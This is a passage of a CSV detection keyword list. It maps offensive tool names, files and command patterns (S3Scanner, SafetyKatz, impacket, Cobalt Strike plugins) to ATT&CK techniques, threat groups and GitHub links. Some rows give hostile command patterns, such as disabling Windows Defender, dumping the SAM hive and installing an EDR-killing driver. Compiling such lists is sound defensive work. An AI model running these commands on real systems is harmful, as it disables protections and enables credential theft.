T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rxwx/cs-rdll-ipc-example","1","1","N/A","10","10","101","24","2020-06-24T19:47:35Z","2020-06-24T19:43:56Z" +"*s0lst1c3*","offensive_tool_keyword","Github Username","Github username hosting exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/s0lst1c3","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*s0md3v*","offensive_tool_keyword","Github Username","github username hosting offensive tools. mostly for web hacking","N/A","N/A","N/A","N/A","Web Attacks","https://github.com/s0md3v","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*s0md3v*Striker*","offensive_tool_keyword","Striker","Recon & Vulnerability Scanning Suite for web services","T1210.001 - T1190 - T1595 - T1192","TA0007 - TA0002 - TA0008 - ","N/A","N/A","Web Attacks","https://github.com/s0md3v/Striker","1","1","N/A","N/A","10","2116","454","2023-06-04T20:15:11Z","2017-10-30T07:08:02Z" +"*S12cybersecurity/Admin2Sys*","offensive_tool_keyword","Admin2Sys","Admin2Sys it's a C++ malware to escalate privileges from Administrator account to NT AUTORITY SYSTEM","T1055.002 - T1078.003 - T1068","TA0002 - TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/S12cybersecurity/Admin2Sys","1","1","N/A","10","1","31","15","2023-05-01T19:32:41Z","2023-05-01T18:50:51Z" +"*S12cybersecurity/RDPCredentialStealer*","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","10","2","196","34","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z" +"*S3cretP4ssw0rd!*","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","0","N/A","10","5","485","87","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" +"*S3cur3Th1sSh1t*","offensive_tool_keyword","Github Username","Github username of hackr known for exploitation scripts Pentesting. scripting and pwning!","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*S3cur3Th1sSh1t/MultiPotato*","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","1","N/A","10","5","485","87","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" +"*S3cur3Th1sSh1t/PowerSharpPack*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*s3scanner -*","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","0","N/A","8","10","2222","366","2023-10-02T13:25:28Z","2017-06-19T22:14:21Z" +"*s3scanner dump *","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","0","N/A","8","10","2222","366","2023-10-02T13:25:28Z","2017-06-19T22:14:21Z" +"*s3scanner scan *","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","0","N/A","8","10","2222","366","2023-10-02T13:25:28Z","2017-06-19T22:14:21Z" +"*S3Scanner-master*","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","1","N/A","8","10","2222","366","2023-10-02T13:25:28Z","2017-06-19T22:14:21Z" +"*S4U2self.py*","offensive_tool_keyword","POC","script used in the POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","7","643","112","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" +"*S4uDelegator.*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" +"*S4UTomato 1.0.0-beta*","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","10","4","316","58","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" +"*S4UTomato.csproj*","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","1","N/A","10","4","316","58","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" +"*S4UTomato.exe*","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","1","N/A","10","4","316","58","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" +"*S4UTomato.sln*","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","1","N/A","10","4","316","58","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" +"*S4UTomato-master*","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","1","N/A","10","4","316","58","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" +"*s7scan*","offensive_tool_keyword","Github Username","s7scan is a tool that scans networks. enumerates Siemens PLCs and gathers basic information about them. such as PLC firmware and hardwaare version. network configuration and security parameters. It is completely written on Python.","T1046 - T1018 - T1049 - T1040 - T1016 - T1057","TA0043 - TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/klsecservices/s7scan","1","1","N/A","N/A","2","121","45","2018-12-28T12:11:56Z","2018-10-12T08:52:04Z" +"*sa7mon/S3Scanner*","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","1","N/A","8","10","2222","366","2023-10-02T13:25:28Z","2017-06-19T22:14:21Z" +"*safari_in_operator_side_effect.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*safari_proxy_object_type_confusion.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*SafeBreach-Labs/EDRaser*","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","118","16","2023-09-27T13:45:05Z","2023-08-10T04:30:45Z" +"*safetydump*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*safetydump.ninja*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"*safetydump.ninja*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"*SafetyKatz.csproj*","offensive_tool_keyword","SafetyKatz","SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. First. the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. removing the file after execution is complete","T1003 - T1055 - T1059 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/SafetyKatz","1","1","N/A","10","10","1101","244","2019-10-01T16:47:21Z","2018-07-24T17:44:15Z" +"*SafetyKatz.exe*","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1356","214","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" +"*SafetyKatz.exe*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" +"*SafetyKatz.exe*","offensive_tool_keyword","SafetyKatz","SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. First. the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. removing the file after execution is complete","T1003 - T1055 - T1059 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/SafetyKatz","1","1","N/A","10","10","1101","244","2019-10-01T16:47:21Z","2018-07-24T17:44:15Z" +"*SafetyKatz.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SafetyKatz.Program*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*SafetyKatz.sln*","offensive_tool_keyword","SafetyKatz","SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. First. the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. removing the file after execution is complete","T1003 - T1055 - T1059 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/SafetyKatz","1","1","N/A","10","10","1101","244","2019-10-01T16:47:21Z","2018-07-24T17:44:15Z" +"*safetykatz.txt*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*SafetyKatzManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*SafetyKatz-master*","offensive_tool_keyword","SafetyKatz","SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. First. the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. removing the file after execution is complete","T1003 - T1055 - T1059 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/SafetyKatz","1","1","N/A","10","10","1101","244","2019-10-01T16:47:21Z","2018-07-24T17:44:15Z" +"*sailay1996*","offensive_tool_keyword","Github Username","github username hosting exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/sailay1996","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Salsa-tools*","offensive_tool_keyword","Salsa-tools","Salsa Tools - An AV-Safe Reverse Shell dipped on bellota sauce Salsa Tools is a collection of three different tools that combined. allows you to get a reverse shell on steroids in any Windows environment without even needing PowerShell for its execution. In order to avoid the latest detection techniques (AMSI). most of the components were initially written on C#. Salsa Tools was publicly released by Luis Vacas during his Talk Inmersin en la explotacin tiene rima which took place during h-c0n in 9th February 2019","T1027 - T1036 - T1059 - T1071 - T1073 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/Hackplayers/Salsa-tools","1","0","N/A","N/A","6","564","140","2020-01-31T22:41:35Z","2019-02-04T21:31:28Z" +"*sam_the_admin.py*","offensive_tool_keyword","sam-the-admin","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1208 - T1218.005 - T1055.002","TA0006 - TA0007 - TA0008","N/A","N/A","Exploitation tools","https://github.com/WazeHell/sam-the-admin/tree/main/utils","1","0","N/A","N/A","10","929","190","2022-07-10T22:23:13Z","2021-12-11T15:10:30Z" +"*SamAdduser.exe*","offensive_tool_keyword","cobaltstrike","Use windows api to add users which can be used when net is unavailable","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/lengjibo/NetUser","1","1","N/A","10","10","410","90","2021-09-29T14:22:09Z","2020-01-09T08:33:27Z" +"*sambaPipe.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*samdump.exe*","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1004","158","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" +"*samdump.py*","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1004","158","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" +"*samdump.zip*","offensive_tool_keyword","samdump","Dumping sam","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/nyxgeek/classic_hacking_tools","1","1","N/A","N/A","1","2","0","2023-04-16T02:15:42Z","2023-04-16T01:49:12Z" +"*samdump2 *","offensive_tool_keyword","samdump2","Retrieves syskey and extract hashes from Windows 2k/NT/XP/Vista SAM.","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://salsa.debian.org/pkg-security-team/samdump2","1","0","N/A","10","6","N/A","N/A","N/A","N/A" +"*samdump2 SYSTEM SAM > *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*samdump2.c*","offensive_tool_keyword","samdump2","Retrieves syskey and extract hashes from Windows 2k/NT/XP/Vista SAM.","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://salsa.debian.org/pkg-security-team/samdump2","1","0","N/A","10","6","N/A","N/A","N/A","N/A" +"*sample_brc4.json*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" +"*samr_##*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*samratashok/nishang*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*samrdump.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*sandboxevasion.py*","offensive_tool_keyword","disctopia-c2","Windows Remote Administration Tool that uses Discord Telegram and GitHub as C2s","T1105 - T1043 - T1102","TA0003 - TA0008 - TA0002","N/A","N/A","C2","https://github.com/3ct0s/disctopia-c2","1","1","N/A","10","10","321","89","2023-09-26T12:00:16Z","2022-01-02T22:03:10Z" +"*SAP_GW_RCE_exploit*","offensive_tool_keyword","SAP_GW_RCE_exploit","This PoC exploits an ACL misconfiguration in the SAP Gateway (port 33xx) that leads to a Remote Command Execution (RCE).SAPanonGWv1.py is the first version of the exploit based on raw packets sent. It does not require any additional modules (Run and Pwn!) SAPanonGWv2.py is the second version of the exploit based on the pysap library","T1078 - T1046 - T1201 - T1021","TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tools","https://github.com/chipik/SAP_GW_RCE_exploit","1","0","N/A","N/A","2","145","48","2020-09-07T13:46:04Z","2019-03-14T13:52:00Z" +"*sap2john.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*SauronEye.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*sc config WinDefend start= disabled*","greyware_tool_keyword","shell","Defense evasion technique In order to avoid detection at any point of the kill chain. attackers use several ways to disable anti-virus. disable Microsoft firewall and clear logs.","T1562.001 - T1562.002 - T1070.004","TA0007 - TA0040 - TA0005","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*sc create plumber*warpzoneclient*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*sc create Terminator *.sys*","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 